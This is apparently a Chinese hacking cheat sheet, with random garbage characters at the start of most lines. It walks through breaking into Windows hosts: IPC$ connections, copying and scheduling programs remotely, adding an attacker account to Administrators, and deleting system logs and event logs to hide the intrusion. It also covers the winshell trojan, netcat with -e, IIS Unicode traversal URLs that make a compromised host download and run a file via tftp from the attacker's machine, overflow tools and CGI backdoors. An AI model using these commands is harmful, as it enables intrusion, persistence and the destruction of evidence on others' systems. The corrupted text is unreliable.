网管和黑客都必须知道的命令
T0fm6
J 常用的几条NET命令:
9+*{3 t Heqr1btK (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
PSAEW.L .I|b9$V (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
vO?sHh Zt41f PQ (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
/kr|}`#
Z [H!do$[> (查看远程主机时间) net time \\IP地址
@P0rNO%y V G7#C@>Z (定时启动某个程序) at \\IP地址 02:18 readme.exe
vt"bB bO$KV"*! (查看共享) net view \\IP地址
b"o\-iUioe I3.JAoB>! (查看netbios工作组列表) nbtstat -A IP地址
_0
43, 3bGU;2~} (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
/AX)n:, `yl|NL (这两条把自己增加到管理员组): net user 用户名 密码 /add
{TJ"O TPx0LDk%( net localgroup Administrators 用户名 /add
!b0A%1W; w$s6NBF7 (断开连接) net use \\IP地址\ipc$ /delete
gZ>&cju n=DmdQ} 扫尾:
WllQM,h Ot=nKdP}D del C:\winnt\system32\logfiles\*.*
9:%')M&Q i\
7JQZ del C:\winnt\ssytem32\config\*.evt
1)}hzA u-.5rH l del C:\winnt\system32\dtclog\*.*
#Q_Scxf !+Cc^{ del C:\winnt\system32\*.log
TG?>;It& R'F \9eyA del C:\winnt\system32\*.txt
-{A64gfFxT [KGj70|~ del C:\winnt\*.txt
\{*`-Pv `:ZaT('h del C:\winnt\*.log
mV}8s]29 _o?aO C 一、netsvc.exe
t#f-3zd9 w"kBAi& 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
`v(!IBP| :zIB3nT^ netsvc /list \\IP地址
JC$_Pg! |w~*p
N0 netsvc schedule \\IP地址 /query
(:H4 oKkDG|IE netsvc \\IP地址 schedule /start
wE9z@\z] vfDX~_N 二、OpenTelnet.exe
Iza#v0 ,Cm1~ExJ 远程启动主机的Telnet服务,并绑定端口到7878,例如:
{J)gS m(xyEU OpenTelnet \\IP地址 用户名 密码 1 7878
Y*jkUQ C@XnV=J 然后就可以telnet到主机的7878端口,进入DOS方式下:
4%yeEc;z R Ee~\n+P^ telnet IP地址 7878
BUI#y `J ;x|?N* 三、winshell.exe
_Nz?fJ:$@ Z~w?Qm:/ 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
X+\=dhn69 #Ph8? p Path (查看winshell主程序的路径信息)
%dd B$( Xa'b@*o& b reBoot (重新启动机器)
-idbR[1{? m=iKu(2xRq d shutDown (关闭机器)
h|z59h&X8G qpf|.m s Shell (执行后你就会看到可爱的“C:\>”)
5
r<cna /sB,)>X
x eXit (退出本次登录会话,此命令并不终止winshell的运行)
04X/(74 Wb^g{F!W CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
.`D$.|!8g 7O=7lQ 四、3389登陆器,GUI方式登录远程主机的
6h[fk.W_ :Ef$[_S> 五、elsave.exe
W-1Ub |8C 9-=kVmT&g 事件日志清除工具
|M?VmG/6 maQDD* elsave -s \\IP地址 -l "application" -C
?ZKIs9E[m ]K5j(1EN elsave -s \\IP地址 -l "system" -C
68qCY ,0,&
L elsave -s \\IP地址 -l "security" -C
?[5_/0L,= sU^K5oo 执行后成功清除应用程序日志,系统日志,安全日志
\rbvlO?} 9M[ 六、hbulot.exe
=p8iYtI NU7k2`bqAk 开启win2kserver和winxp的3389服务
S U P :N4?W}r. hbulot [/r]
LwI 4 2 !1+!;R@&H> 使用/r表示安装完成后自动重起目标使设置生效。
,UT :wpc^i ]4_)WUS.c 七、nc.exe(netcat.exe)
c<)O#i@3/ F
B&l|#e 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
b~rlh=(o#_ g3'yqIjQL 想要连接到某处: nc [-options] hostname port[s] [ports] ...
y2x)<.cDP g.Kyfs4` 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
VsRdZ4 s(Fxi|v; 参数:
LaIH3!M3 d[e;Fj! -e prog 程序重定向,一旦连接,就执行 [危险!!]
H#I%6k*\a 6~8X/
-02 -g gateway source-routing hop point[s], up to 8
z
2Ao6*% >D$NEO^ -G num source-routing pointer: 4, 8, 12, ...
<:0d%YB) Jy#21 -h 帮助信息
j2!^iGS} 4,6nk.$yN -i secs 延时的间隔
}z wHUf9q1 b0Fr]oGp -l 监听模式,用于入站连接
l:"zYcp% P/~kX_ -n 指定数字的IP地址,不能用hostname
kD4J{\ OD1>s6uA7 -o file 记录16进制的传输
pH!8vnoA R)5zHCwOw -p port 本地端口号
pS<j>y T#G
(&0J5 -r 任意指定本地及远程端口
E\=23[0 2sqNTuO6,| -s addr 本地源地址
)XL}u4X MF~Tr0tOC -u UDP模式
0RGSv!w J*'#!
xIa -v 详细输出——用两个-v可得到更详细的内容
km#Rh^ E6y ?DXWH -w secs timeout的时间
&o*f*(C2 O'<cEv'B* -z 将输入输出关掉——用于扫描时
J |TA12s 八、TFTPD32.EXE
=L?(mNHT Sg}]5Mn` 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
C
Ejf&n }CXL\,; http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
LTc=D ^ s@'nKc 然后可以直接令文件运行:
Z3]ut#` 7|eD}=jy http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
Yv [j5\:x 8'X:}O/ 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
34\:1z+s M MX{p)(HW 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
h q&2o `^7ARr/ 一、一 Xscan命令行运行参数说明:
;\Vi~2!8 a\m@I_r.N 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
<rs"$JJV Pq:GvM` 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
?3
l4U g0BJj= xscan -file <主机列表文件名> <检测项目> [其他选项]
K 6Gri>Um g [~"c} 其中<检测项目> 含义如下:
:7+E
fu V=,VOw4 -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
|P"p/iY O1_dA%m
-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
tzeS D C #D-L>7,jA -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
S%7^7MSqA C4jqT -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
)Ekp <2B:0 <""
fJ`7 -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
.l->O-= _lE0_X|d [其他选项] 含义如下:
aBO%qmtt 62 biOea -v: 显示详细扫描进度
C?3?<FDL ^sNj[%I
R -p: 跳过Ping不通的主机
/k(KA [bS t9zF
WdW -o: 跳过没有检测到开放端口的主机
l 6;}nG *$ihNX]YG -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10